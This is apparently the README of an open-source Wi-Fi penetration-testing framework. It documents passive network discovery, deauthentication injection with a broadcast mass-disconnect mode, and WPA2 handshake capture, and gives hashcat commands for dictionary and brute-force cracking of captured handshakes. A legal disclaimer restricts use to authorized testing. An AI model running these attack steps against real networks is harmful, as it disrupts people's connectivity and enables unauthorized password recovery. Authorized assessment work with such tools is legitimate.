Enterprise-Grade Wireless Network Security Assessment Platform
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Zero Shell Dependencies β Real-Time Packet Processing β Kernel Watchdog β
β Thread-Safe Operations β Autonomous Recovery β Memory-Safe β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Features β’ Quick Start β’ Installation β’ Architecture β’ License
- Overview
- Features
- Architecture
- Requirements
- Installation
- Quick Start
- Usage Examples
- Advanced Features
- Project Structure
- Technical Details
- Troubleshooting
- Contributing
- Legal Disclaimer
- License
- Credits
This framework provides a complete wireless security assessment toolkit that combines passive reconnaissance, real-time packet capture, deauthentication attacks, and WPA/WPA2 handshake capture in a single, cohesive pipeline. Built with enterprise reliability in mind, it features autonomous driver recovery, thread-safe operations, and comprehensive error handling.
- Zero Shell Dependencies: Direct kernel interaction via
pyroute2RTNL/nl80211 APIs (noiw,airmon-ng,ifconfig) - Real-Time Packet Processing: Scapy
AsyncSnifferwith in-process 802.11 frame parsing (no CSV files, no airodump-ng) - Kernel Watchdog: Autonomous driver panic detection and recovery via debugfs + RTNL event monitoring
- Production-Ready: Thread-safe, memory-leak-free, with graceful degradation on hardware failures
- Offensive Capabilities: Precision deauthentication with dual-spoofing + EAPOL handshake capture
- Real-Time AP Discovery: Live 802.11 beacon/probe response parsing
- Detailed Network Intelligence: BSSID, ESSID, channel, encryption (WPA2/WPA3/WEP/OPEN), signal strength, frequency
- Hidden Network Detection: Captures networks without broadcast SSID
- Concurrent Monitoring: Non-blocking capture with progress updates
- Precision Deauthentication: Dual-spoofing (APβClient + ClientβAP) to bypass basic protections
- Broadcast Targeting: Mass disconnection mode (
FF:FF:FF:FF:FF:FF) - EAPOL Handshake Capture: Real-time 4-way handshake extraction with incremental
.pcapwriting - Crash-Resilient: Survives driver resets mid-capture (sync flush after every frame)
- Auto-Target Selection: Strongest encrypted AP or explicit BSSID targeting
- Kernel Watchdog: Monitors debugfs counters + RTNL link events β auto-recovery via
modprobe -r/modprobe - Thread-Safe Logging: Double-checked locking, session-scoped file handlers, DEBUG + INFO streams
- Process Group Management:
start_new_session=True+killpgfor clean termination - Graceful Cleanup: Interface restoration even on
KeyboardInterruptor crashes
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β main.py (CLI Entry Point) β
β argparse + orchestrator β
ββββββββββββββββββββββββββββββ¬βββββββββββββββββββββββββββββββββββββββββ
β
βΌ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β core/orchestrator.py (Pipeline) β
β βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β β Phase 1: Observability β kernel_watchdog.start() β β
β β Phase 2: Control Plane β netlink_ctrl.enable_monitor_mode() β β
β β Phase 3: Data Plane β capture_engine.stream() β β
β β Phase 4: Offensive β injector + eapol_capture β β
β β Cleanup: Restore β netlink_ctrl.disable_monitor_mode() β β
β βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β
ββββββββββββββββββββββΌβββββββββββββββββββββ
βΌ βΌ βΌ
ββββββββββββββββ ββββββββββββββββββββ βββββββββββββββββββ
β netlink_ctrl β β capture_engine β β kernel_watchdog β
β (pyroute2) β β (Scapy) β β (debugfs/RTNL) β
ββββββββββββββββ€ ββββββββββββββββββββ€ βββββββββββββββββββ€
β β’ RTNL link β β β’ AsyncSniffer β β β’ DebugFS poll β
β β’ nl80211 β β β’ 802.11 parser β β β’ RTNL monitor β
β β’ iftype set β β β’ AP extraction β β β’ Auto-recovery β
ββββββββββββββββ ββββββββββββββββββββ βββββββββββββββββββ
β
ββββββββββββββββββββββΌβββββββββββββββββββββ
βΌ βΌ βΌ
ββββββββββββββββ ββββββββββββββββββββ βββββββββββββββββββ
β injector β β eapol_capture β β logger β
β (Deauth Tx) β β (Handshake Rx) β β (Thread-safe) β
ββββββββββββββββ€ ββββββββββββββββββββ€ βββββββββββββββββββ€
β β’ Dual-spoof β β β’ BPF filter β β β’ Session file β
β β’ Broadcast β β β’ PcapWriter β β β’ Console INFO β
β β’ Tx pacing β β β’ sync=True β β β’ DEBUG to disk β
ββββββββββββββββ ββββββββββββββββββββ βββββββββββββββββββ
- Observability Start: Kernel watchdog spawns daemon threads (debugfs + RTNL monitoring)
- Monitor Mode Transition: RTNL/nl80211 sets interface type to
monitor+ brings link up - AP Discovery: AsyncSniffer captures beacons/probe responses β real-time parsing
- Offensive Operations (optional): Deauth injection + EAPOL handshake capture with Tx/Rx synchronization
- Cleanup: Restore interface to
managedmode, stop watchdog, flush logs
| Component | Requirement |
|---|---|
| OS | Linux (kernel β₯ 4.4) |
| Python | 3.10 or higher |
| Privileges | Root / sudo (hardware operations) |
| Driver Stack | mac80211 (monitor mode support) |
Your Wi-Fi adapter must support true monitor mode (ARPHRD_IEEE80211_RADIOTAP).
Verify monitor mode capability:
sudo iw dev wlan0 set type monitor
iw dev wlan0 info | grep type # Should show "monitor"| Driver | Chipsets | Injection Support |
|---|---|---|
| ath9k | AR9271, AR9280, AR9285, AR9287 | β Excellent |
| ath10k | QCA9377, QCA6174, QCA9887 | β Good |
| mt76 | MT7612U, MT7610U, MT7921 | β Good |
| rtw88 | RTL8822BE, RTL8821CE | |
| rtl8812au | RTL8812AU, RTL8814AU (DKMS) | β Excellent |
π‘ Note: Realtek USB adapters (rtl88xx) often require out-of-tree drivers. See Aircrack-ng compatibility list.
# Core dependencies
pip install pyroute2 scapy
# Optional (for development)
pip install pytest black mypy# Debian / Ubuntu / Kali Linux
sudo apt update
sudo apt install iw iproute2 python3-pip
# Arch Linux
sudo pacman -S iw iproute2 python-pip
# Fedora / RHEL
sudo dnf install iw iproute python3-pipπ‘ Note:
aircrack-ngis not required for core functionality but useful for post-capture analysis.
# 1. Clone the repository
git clone https://github.com/AliAkgun0/wifi-security-framework
cd wifi-security-framework
# 2. Install Python dependencies
pip3 install -r requirements.txt
# 3. Verify installation
sudo python3 main.py --help# Create isolated Python environment
python3 -m venv .venv
source .venv/bin/activate
# Install dependencies
pip install -r requirements.txt
# Verify
python3 main.py --help# 1. Verify root access
sudo whoami # Should print "root"
# 2. Check rfkill status
rfkill list all
# If "Soft blocked: yes" β Run: rfkill unblock wifi
# If "Hard blocked: yes" β Enable Wi-Fi via hardware switch/BIOS
# 3. Verify monitor mode support
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up
iw dev wlan0 info # type: monitor
# 4. Restore to managed mode
sudo ip link set wlan0 down
sudo iw dev wlan0 set type managed
sudo ip link set wlan0 upFor ath9k/ath10k chipsets, disable hardware encryption:
echo "options ath9k nohwcrypt=1" | sudo tee /etc/modprobe.d/ath9k.conf
sudo modprobe -r ath9k
sudo modprobe ath9k# Scan for Wi-Fi networks (15 seconds)
sudo python3 main.py wlan0
# Custom scan duration
sudo python3 main.py wlan0 --scan-time 30# Auto-target strongest encrypted AP
sudo python3 main.py wlan0 --exploit
# Target specific BSSID
sudo python3 main.py wlan0 --exploit --target AA:BB:CC:DD:EE:FF
# Advanced parameters
sudo python3 main.py wlan0 --exploit --target AA:BB:CC:DD:EE:FF --deauth-count 128 --handshake-timeout 45sudo python3 main.py wlan0 --scan-time 30Output:
[INFO] AP | bssid=AA:BB:CC:DD:EE:FF ch=6 enc=WPA2 rssi=-42 dBm essid=HomeNetwork
[INFO] AP | bssid=11:22:33:44:55:66 ch=11 enc=WPA3-SAE rssi=-58 dBm essid=Neighbor5G
[INFO] Discovery complete - 2 access point(s) found
sudo python3 main.py wlan0 --exploit --target AA:BB:CC:DD:EE:FFOutput:
[Phase 4] Starting EAPOL capture (pre-injection)
[Phase 4] Launching deauth injection burst
[Phase 4] Injection complete | frames=128 duration=6.40s
[Phase 4] EAPOL frame captured | total=4
[Phase 4] SUCCESS | Handshake captured | pcap=./reports/handshake_AABBCCDDEEFF_20260608_211543.pcap
# Convert PCAP to hashcat format
hcxpcapngtool -o hash.hc22000 reports/handshake_*.pcap
# Dictionary attack
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt
# Brute force
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?dMonitors driver health via debugfs + RTNL link events. Auto-recovers on:
- Tx queue stuck
- Hardware scan timeout
- Interface down events
# Enable watchdog (default)
sudo python3 main.py wlan0 --exploit
# Disable watchdog (debugging only)
sudo python3 main.py wlan0 --exploit --no-watchdog# Test injection only
sudo python3 test_offensive.py --mode inject --iface wlan0mon --target AA:BB:CC:DD:EE:FF
# Test EAPOL capture only
sudo python3 test_offensive.py --mode capture --iface wlan0mon --target AA:BB:CC:DD:EE:FF
# Test full exploit cycle
sudo python3 test_offensive.py --mode exploit --iface wlan0mon --target AA:BB:CC:DD:EE:FFwifi-security-framework/
βββ π main.py # CLI entry point (argparse)
βββ π§ͺ test_offensive.py # Standalone test harness
βββ π requirements.txt # Python dependencies
βββ π LICENSE # Educational & Authorized Testing License
β
βββ π§ core/ # Core modules
β βββ orchestrator.py # Pipeline coordinator (4 phases)
β βββ netlink_ctrl.py # RTNL/nl80211 interface control
β βββ capture_engine.py # Scapy AsyncSniffer + 802.11 parser
β βββ kernel_watchdog.py # DebugFS/RTNL health monitor
β βββ injector.py # Deauth packet forging (Scapy)
β βββ eapol_capture.py # WPA handshake capture
β βββ executor.py # Subprocess manager (legacy)
β βββ parser.py # IPC protocol parser (legacy)
β βββ logger.py # Thread-safe logging factory
β
βββ π modules/ # Legacy BASH wrappers (compatibility)
β βββ monitor_mode.sh # Calls netlink_ctrl
β βββ discovery.sh # Calls capture_engine
β βββ cleanup.sh # Calls netlink_ctrl
β
βββ π logs/ # Session logs (auto-created)
βββ π¦ reports/ # Captured handshakes (auto-created)
- Logger: Double-checked locking on handler creation
- Injector: Internal lock serializes
sendp()calls - EAPOL Capture: PcapWriter lock prevents race conditions
- AsyncSniffer:
store=Falseprevents memory leaks
t=0s β EAPOL capture starts (background thread)
t=2s β Sniffer ready (grace period)
t=2s β Deauth injection begins
t=8s β Injection complete (128 frames @ 0.1s interval)
t=8-38s β Handshake capture window (30s timeout)
t=38s β EAPOL capture stops, pcap flushed
- Tx Queue Protection: Minimum 0.1s inter-frame interval
- Crash Recovery: Watchdog detects panics β
modprobe -r/modprobe - Data Durability:
PcapWriter(sync=True)β immediate disk flush
AsyncSniffer(store=False)β no packet accumulation- Generator-based streaming β constant memory usage
- Daemon threads β auto-cleanup on exit
Possible Causes:
-
No active clients on target AP
# Verify clients exist before attacking sudo airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF --channel 6 -
WPA3-SAE only network (no WPA2 fallback)
- This tool captures WPA2 4-way handshakes only
- WPA3-SAE uses different authentication frames
-
PMF (Protected Management Frames) enabled
- Deauth attacks are blocked by IEEE 802.11w
- Try targeting older APs without PMF
-
Injection not working
# Test injection capability sudo aireplay-ng --test wlan0mon
# Check if interface exists
ip link show wlan0
# Check if already in use
sudo airmon-ng check kill # Stops conflicting processes
# Manual monitor mode
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up# Verify root access
sudo whoami # Must output "root"
# Run with sudo
sudo python3 main.py wlan0 --exploit
# Or switch to root shell
sudo -i
cd /path/to/wifi-security-framework
python3 main.py wlan0 --exploitThis is expected behavior. The watchdog reloads the driver (modprobe -r/modprobe), which recreates the interface. The framework handles this automatically.
For ath9k:
echo "options ath9k nohwcrypt=1" | sudo tee /etc/modprobe.d/ath9k.conf
sudo modprobe -r ath9k && sudo modprobe ath9kFor rtl88xx:
- Reduce
--deauth-countto 32 - Increase interval (code modification required)
Improvements:
- Stronger signal: Move closer to AP (target RSSI > -60 dBm)
- More deauth frames:
--deauth-count 128 - Longer timeout:
--handshake-timeout 45.0 - Verify active clients: Use
airodump-ngto confirm client presence - Check channel: Ensure interface is on correct channel
Contributions are welcome! Please follow these guidelines:
Open an issue with:
- OS & kernel version:
uname -a - Wi-Fi chipset:
lspci | grep -i wirelessorlsusb | grep -i wireless - Driver:
lsmod | grep -E "ath|rtw|mt76" - Full error log: Attach
logs/*_session.log
- Fork the repository
- Create a feature branch:
git checkout -b feature/amazing-feature - Follow existing code style (PEP 8, type hints)
- Add tests if applicable
- Update documentation
- Submit PR with detailed description
# Install dev dependencies
pip install -r requirements-dev.txt # (if exists)
# Run tests
pytest tests/
# Code formatting
black core/ main.py test_offensive.py
# Type checking
mypy core/ main.pyThis framework is designed exclusively for:
| β PERMITTED USES |
|---|
| π Educational purposes in controlled lab environments |
| π¬ Security research on networks you own or control |
| π Authorized penetration testing with explicit written permission |
| π― CTF competitions and authorized security challenges |
| πΌ Professional security services using the tool internally for authorized assessments |
| β PROHIBITED ACTIVITIES |
|---|
| Testing networks without explicit written authorization |
| Intercepting communications you are not authorized to access |
| Disrupting network services without permission |
| Any activity violating local, state, federal, or international laws |
| Selling, licensing, or commercially distributing this software |
Unauthorized use may violate:
| πΊπΈ United States | Computer Fraud and Abuse Act (CFAA) 18 U.S.C. Β§ 1030 |
| πͺπΊ European Union | Directive 2013/40/EU (Attacks against information systems) |
| π¬π§ United Kingdom | Computer Misuse Act 1990 |
| π International | Council of Europe Convention on Cybercrime (Budapest Convention) |
Violation of these laws can result in:
- π Criminal prosecution and felony charges
- βοΈ Civil liability and substantial damages
- π Imprisonment (up to 20+ years in severe cases)
- π° Substantial fines and penalties
- π Permanent criminal record
Before using this tool, you MUST:
- π Obtain Written Authorization: Explicit written permission from the network/system owner
- π― Define Scope of Engagement: Clear documentation of what can and cannot be tested
- π Document All Activities: Maintain detailed logs for accountability
- π Follow Professional Standards: Adhere to PTES, OWASP, NIST guidelines
- π€ Practice Responsible Disclosure: Report findings through proper channels
YOU ASSUME ALL LEGAL RESPONSIBILITY. The authors and contributors:
- Do NOT authorize illegal or unauthorized use
- Are NOT LIABLE for any misuse of this software
- Provide this tool "AS IS" without any warranty
By using this software, you acknowledge that you have read and understood the LICENSE file and agree to be bound by its terms.
This project is licensed under the Educational and Authorized Security Testing License.
| Permission | Status | Notes |
|---|---|---|
| π Educational Use | β | Academic, training, personal learning |
| π Professional Penetration Testing | β | As an internal tool with written authorization |
| π¬ Security Research | β | On systems you own or have permission to test |
| π― CTF Competitions | β | Authorized security challenges |
| π Studying & Modifying Code | β | For learning and improvement |
| π« Commercial Distribution | β | Selling, licensing, or product integration prohibited |
| π« Unauthorized Access | β | Illegal and strictly prohibited |
| π« Malicious Use | β | Criminal activity prohibited |
β You MAY:
- Use this tool as part of professional penetration testing services (when properly authorized)
- Deliver security assessment reports to clients using findings from this tool
- Earn revenue from security services where this tool is used internally
β You MAY NOT:
- Sell or license the software itself to clients or third parties
- Incorporate the software into commercial products or services
- Distribute the software as part of SaaS/PaaS offerings
- Provide the software to clients for their direct use
The distinction: You're selling your expertise and deliverables, not the software itself.
The complete license terms can be found in the LICENSE file.
Key sections include:
- Detailed definitions of permitted and prohibited uses
- Professional security services clarifications
- Warranty disclaimers and liability limitations
- User obligations and indemnification
- Export compliance and jurisdiction provisions
π‘ For commercial licensing inquiries or questions about permitted uses, please contact the copyright holders.
aircrack-ng β’ wifite2 β’ bettercap
π Kali Linux team for maintaining security testing tools
π mac80211 kernel developers
π Open-source security community
If this project helped you, consider giving it a β on GitHub!
Built with β€οΈ for the security research community
Remember: With great power comes great responsibility.